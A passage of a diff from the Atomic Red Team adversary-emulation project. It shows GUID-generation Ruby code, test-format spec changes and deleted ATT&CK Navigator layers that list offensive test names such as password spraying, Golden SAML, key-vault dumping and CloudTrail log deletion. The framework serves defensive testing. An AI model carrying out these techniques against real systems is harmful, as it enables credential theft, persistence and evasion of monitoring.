def record_used_guids!(yaml, used_guids_file)
return unless !yaml.nil?
yaml['atomic_tests'].each_with_index do |atomic, i|
next unless atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
add_guid_to_used_guid_file(guid, used_guids_file) unless guid == ''
end
end
def generate_guids_for_yaml!(path, used_guids_file)
text = File.read(path)
# add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text.gsub!(/(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))/) { |m| "#{$1}\n#{$2.gsub(/-/," ")}auto_generated_guid:"}
# fill the "auto_generated_guid:" element in if it doesn't contain a guid
text.gsub!(/(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$/) { |m| "#{$1} #{get_unique_guid!(used_guids_file)}"}
File.open(path, "w") { |file| file << text }
end
# generates a unique guid and records the guid as having been used by writing it to the used_guids_file
def get_unique_guid!(used_guids_file)
new_guid = ''
20.times do |i| # if it takes more than 20 tries to get a unique guid, there must be something else going on
new_guid = SecureRandom.uuid
break unless !is_unique_guid(new_guid, used_guids_file)
end
# add this new unique guid to the used guids file
add_guid_to_used_guid_file(new_guid, used_guids_file)
return new_guid
end
# add guid to used guid file if it is the proper format and is not already in the file. raises an exception if guid isn't valid
def add_guid_to_used_guid_file(guid, used_guids_file)
open(used_guids_file, 'a') { |f|
raise("the GUID (#{guid}) does not match the required format for the `auto_generated_guid` element") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/ =~ guid
f.puts guid unless !is_unique_guid(guid, used_guids_file)
}
end
def is_unique_guid(guid, used_guids_file)
return !File.foreach(used_guids_file).grep(/#{guid}/).any?
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
atomic_red_team/atomic_test_template.yaml
+4 -14
View File
@@ -10,27 +10,17 @@ atomic_tests:
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: TODO
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands.
dependencies: # (optional)
- description: |
TODO
prereq_command: | # Commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the prerequisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # Commands to meet this prerequisite or a message describing how to meet this prerequisite.
TODO
executor:
name: command_prompt
elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
command: | # These are the actaul attack commands, at least one command must be provided.
TODO
cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
command: |
TODO
atomic_red_team/attack_api.rb
+4 -8
View File
@@ -22,7 +22,6 @@ class Attack
'collection',
'exfiltration',
'command-and-control',
'impact'
]
end
@@ -74,10 +73,9 @@ class Attack
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
@@ -88,10 +86,8 @@ class Attack
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
@@ -114,4 +110,4 @@ class Attack
end
end
end
end
end
atomic_red_team/enterprise-attack.json
+145326 -498633
View File
File diff suppressed because one or more lines are too long
atomic_red_team/spec.yaml
+48 -60
View File
@@ -13,16 +13,13 @@
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# Atomic tests should be fully automated whenever possible, requiring no continued interaction.
# Include any needed options to execute the commands seamlessly, for example SysInternal's -accepteula option or any -q or -quiet modes.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
@@ -38,7 +35,6 @@ atomic_tests:
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
auto_generated_guid: # This key and/or it's value will be added by the CI build after submitting a Pull Request
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
@@ -50,16 +46,9 @@ atomic_tests:
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
# - office-365
# - azure-ad
# - google-workspace
# - saas
# - iaas
# - containers
# - iaas:gcp
# - iaas:azure
# - iaas:aws
supported_platforms:
- windows
@@ -87,60 +76,63 @@ atomic_tests:
type: Url
default: 0000:00:30
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executor:
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - command_prompt, sh, bash, powershell, manual, aws, az, gcloud, kubectl
#
# Each of the above requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe, powershell.exe, sh or bash respectively
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# name: command_prompt
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This should only be used when required, for example when GUI steps are involved that
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# name: manual
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
@@ -150,27 +142,23 @@ atomic_tests:
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
name: command_prompt
elevation_required: true
# indicates whether command must be run with admin privileges.
#If the elevation_required attribute is not defined, the value is assumed to be false
- name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- linux
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executor:
name: bash
executors:
- name: bash
command: echo "Hello world!"
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View 